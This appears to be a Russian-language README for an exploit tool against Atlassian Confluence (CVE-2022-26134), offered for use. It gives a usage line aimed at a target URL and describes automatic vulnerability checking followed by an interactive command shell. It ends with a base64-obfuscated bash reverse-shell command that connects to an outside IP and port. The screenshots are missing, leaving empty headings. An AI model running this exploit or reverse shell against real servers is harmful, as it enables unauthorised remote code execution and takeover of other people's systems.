
[CVE-2022-26134]Confluence: RCE через внедрение OGNL-выражения с обходом песочницы.
Confluence - RCE через инъекцию OGNL-выражения (CVE-2022-26134) PoC и эксплойт
Добавлен обход sandbox, поддержка высоких версий.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
Скрипт автоматически проверяет, уязвима ли цель, и входит в псевдоинтерактивную оболочку, если она уязвима.
Тест в Linux:

Тест в Windows:

Просто введите 'q', чтобы выйти.
Параметры команд передаются напрямую методу runtime.exec, который не имеет контекста оболочки.
поэтому.
В Windows некоторые команды, такие как dir, не могут быть выполнены напрямую; можно использовать cmd.exe /c dir.
В Linux некоторые специальные символы не действуют. Если вам нужно выполнить команду со специальными символами, например reverse shell, вы можете закодировать её в base64 и затем использовать .
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}